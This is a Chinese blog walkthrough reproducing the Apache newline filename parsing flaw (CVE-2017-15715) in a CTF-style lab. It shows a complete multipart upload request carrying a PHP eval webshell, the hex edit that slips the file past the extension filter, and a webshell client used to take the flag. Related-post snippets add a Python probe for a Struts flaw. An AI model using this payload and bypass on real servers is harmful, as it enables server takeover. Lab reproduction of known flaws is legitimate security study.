apache 文件上传 (CVE-2017-15715)

最新推荐文章于 2025-01-05 10:16:15 发布
最新推荐文章于 2025-01-05 10:16:15 发布
阅读量661 收藏 1
点赞数 1
文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_57567689/article/details/127466039
版权

名称:apache 文件上传 (CVE-2017-15715)

描述:

Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。

此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略

步骤1

搭建靶场,进行访问

步骤2

打开代理,利用Bp抓包

发生到重放器{Repeater}

ba33796cb5fc10033a1843c0de792c96.png 

修改{Get}->{POST}

8377ee0170828fc54850e88b6bc5dafb.png 

修改发送端,向系统上传一个携带一句话木马的php

POST / HTTP/1.1
Host: 123.58.224.8:27620
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------9552222486401230933854482358
Content-Length: 359
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------9552222486401230933854482358
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: application/octet-stream

<?php @eval($_POST['cmd'])?>
-----------------------------9552222486401230933854482358
Content-Disposition: form-data; name="name"

1.php
-----------------------------9552222486401230933854482358--

发送到响应端

显示无法上传

步骤3

根据提示

添加后缀{+}

在{Hex}中修改ASCII码{2b}->{0a}

重新上传

上传成功

步骤4

访问上传的一句话木马

使用蚁剑链接,得到flag

凯凯_0523
关注
11-4 Apache换行解析漏洞(CVE-2017-15715
weixin_43263566的博客
11-25 1208
Apache換行解析漏洞(CVE-2017-15715)是一种解析漏洞,可以影响httpd 2.4.0至2.4.29版本中的PHP解析。攻击者可以通过在上传文件名中添加特定的换行符,绕过服务器的安全策略,使其被解析成PHP文件而不是普通文件。未正确配置的服务器未对文件名进行适当验证的服务器使用正则表达式并启用Multiline属性的服务器攻击者可以将1.php\x0A作为文件上传到服务器上,这个文件名看起来像是一个普通的非PHP文件,但是由于其中的特定字符,服务器会将其解析为PHP文件
CVE-2017-15715 apache换行解析&文件上传漏洞
mirocky的博客
10-13 658
CVE-2017-15715 漏洞复现详情
Apache 文件上传
03-22
NULL 博文链接:https://xiaoyaocai-126-com.iteye.com/blog/994744
Apache FileUpload介绍
weixin_30273175的博客
09-01 388
Apache FileUpload组件 在最初的 http 协议中,没有上传文件方面的功能。RFC1867("Form-based File Upload in HTML".)为 http 协议添加了这个功能。客户端的浏览器,如 Microsoft IE, Mozila, Opera 等,按照此规范将用户指定的文件发送到服务器。服务器端的网页程序,如 php, asp, jsp 等,可...
Apache FileUpload文件上传
mmdev
11-27 181
Java Web开发人员可以使用Apache文件上传组件来接收浏览器上传文件,该组件由多个类共同组成,但是, 对于使用该组件来编写文件上传功能的Java Web开发人员来说,只需要了解和使用其中的三个类:DiskFileUpload、FileItem和FileUploadException。这三个 类全部位于org.apache.commons.fileupload包中。 1...
apache文件上传
04-07
apache文件上传的一个简单demo以及文档说明
Web---文件上传-apache的工具处理、打散目录、简单文件上传进度
weixin_34395205的博客
07-23 168
我们需要先准备好2个apache的类: 上一个博客文章只讲了最简单的入门,现在来开始慢慢加深。 先过渡一下:只上传一个file项 index.jsp: <h2>用apache的工具处理文件上传</h2> <!-- 先过渡一下:只上传一个file项 --> <...
Apache HTTPD 换行解析漏洞(CVE-2017-15715
weixin_45534587的博客
01-05 1543
如果是白名单可能不行(在白名单里面才可以上传jpj,png,gif 等),但是如果没有考虑以最后一个点为后缀,通过1.jpg.php%0a的形式也可能能够绕过。前三行的内容意思是将所有以“.php”为后缀的文件内容当作PHP代码进行解析,但是却使用了“$”进行文件匹配,这就导致了漏洞的产生。该漏洞属于用户配置不当所产生的,看一下配置文件信息,输入命令“cat /etc/apache2/conf-available/docker-php.conf”,如图所示。老版本可以通过hex修改,修改完,文件正常上传
Apache换行解析漏洞复现(CVE-2017-15715
weixin_57379923的博客
08-04 743
靶机:由 centos7 搭建的 vulhub,IP:192.168.100.40。浏览器访问上传文件文件名后添加 %0a 进行访问。版 权 声 明:本博客所有文章除特别声明外,均采用。文章版权归作者所有,未经允许请勿转载!作 者:PeiyuJue。
CVE-2017-15715】复现Apache解析漏洞
weixin_44723534的博客
04-10 3668
环境准备 Vulhub漏洞环境介绍 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应的目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。 一、使用Ubuntu搭建vulhub漏洞环境 1.1 更新软件库 执行命令:apt-get update 1.1.1 更新软件库报错解决方法 1.2 安装curl apt-get install curl 执行命令:apt-get install curl 1.3 安装pip
Apache文件上传下载)
01-01
通过apache来实现文件上传下载功能
apache fileupload处理文件上传(流式和非流式)
12-31
apache fileupload 处理文件上传(流式和非流式)临时文件处理
使用apache搭建一个文件上传服务
浒炘的博客
11-18 2628
然后选择图片上传,访问上传图片目录,便可以看到刚刚上传文件。目录下创建一个`uploads.html`文件。创建一个新的 Apache 配置文件(例如,`目录下创建一个 PHP 文件,例如 `然后访问你自己的服务器。
使用Apache文件上传控件实现文件上传
LIAR_luo的博客
07-19 1137
StringgetContentType()获取上传文件类型,例如text/plain、image。如果是普通字段,则返回null。如果是普通字段,则是它的value值;如果是文件字段,则是文件内容。如果是普通字段,则返回value值的输入流。booleanisFormField()判断是否是普通表单字段,若是,返回true,否则返回false。StringgetFieldName()获取表单项的name的属性值。longgetSize()获取字段内容的大小,单位是字节。...
推荐使用:Apache Commons FileUpload —— 高效的文件上传解决方案
gitblog_00003的博客
06-08 587
推荐使用:Apache Commons FileUpload —— 高效的文件上传解决方案 项目地址:https://gitcode.com/gh_mirrors/co/commons-fileupload 项目介绍 Apache Commons FileUpload 是一个由 Apache 软件基金会开发的强大且灵活的组件,旨在为Servlet和Web应用程序提供支持multipart文件上传功...
apache 文件上传 (CVE-2017-15715)漏洞复现
weixin_42675091的博客
09-02 2555
apache 文件上传 (CVE-2017-15715)漏洞复现
文件上传Apache
chenglc1612的博客
09-15 191
文件上传Apache Map<String, Object> rtnMap = new HashMap<String, Object>(); // 获取文件 String tempPath = request.getSession().getServletContext().g...
文件上传,使用Apache组件上传文件
漫步千姿
01-14 336
[color=blue]使用Apache文件上传组件来接受浏览器上传文件,该组件由多个类共同组成,但是,对于使用该组件来编写文件上传功能的Java Web开发人员来说,只需要了解和使用其中的三个类:DisFileUpload, FileItem和FileUploadException。这三个类全部位于org.apache.commons.fileupload包中[/color] 1.[si...
CVE-2017-20005
最新发布
03-08
### 关于CVE-2017-9805漏洞的详情 对于编号为CVE-2017-9805的安全漏洞,这是一个存在于Apache Struts框架中的远程代码执行漏洞。当应用程序使用Struts准备和处理文件上传multipart/form-data请求时,在某些情况下攻击者可以利用此漏洞来触发OGNL表达式的求值并最终实现任意命令执行[^1]。 受影响版本包括但不限于Apache Struts 2.3.x系列直到2.3.34以及2.5.x系列直至2.5.10.1之前的所有版本都受到该问题的影响。 针对这一安全风险,官方建议用户尽快升级至不受影响的新版软件以获得修复补丁。此外,社区也开发了一些辅助工具如`struts-pwn`用于检测环境是否易受攻击,并提供了一种方式去理解和测试这个特定类型的漏洞。 ```python import requests def check_vulnerable(url): headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0' } payload = "%{(#_='multipart/form-data')." try: response = requests.post(url, data=payload, headers=headers) if "500 Internal Server Error" in response.text or response.status_code == 500: print(f"[+] Potential vulnerability detected at {url}") else: print("[!] No obvious signs of vulnerability.") except Exception as e: print(e) # Example usage with a hypothetical URL that might be vulnerable to CVE-2017-9805. check_vulnerable('http://example.com/vulnerable-endpoint') ``` 上述Python脚本展示了如何通过发送特制HTTP POST请求给目标Web应用来初步判断其是否存在CVE-2017-9805漏洞的可能性。请注意这只是一个简单的示例,实际环境中应更加谨慎地评估系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值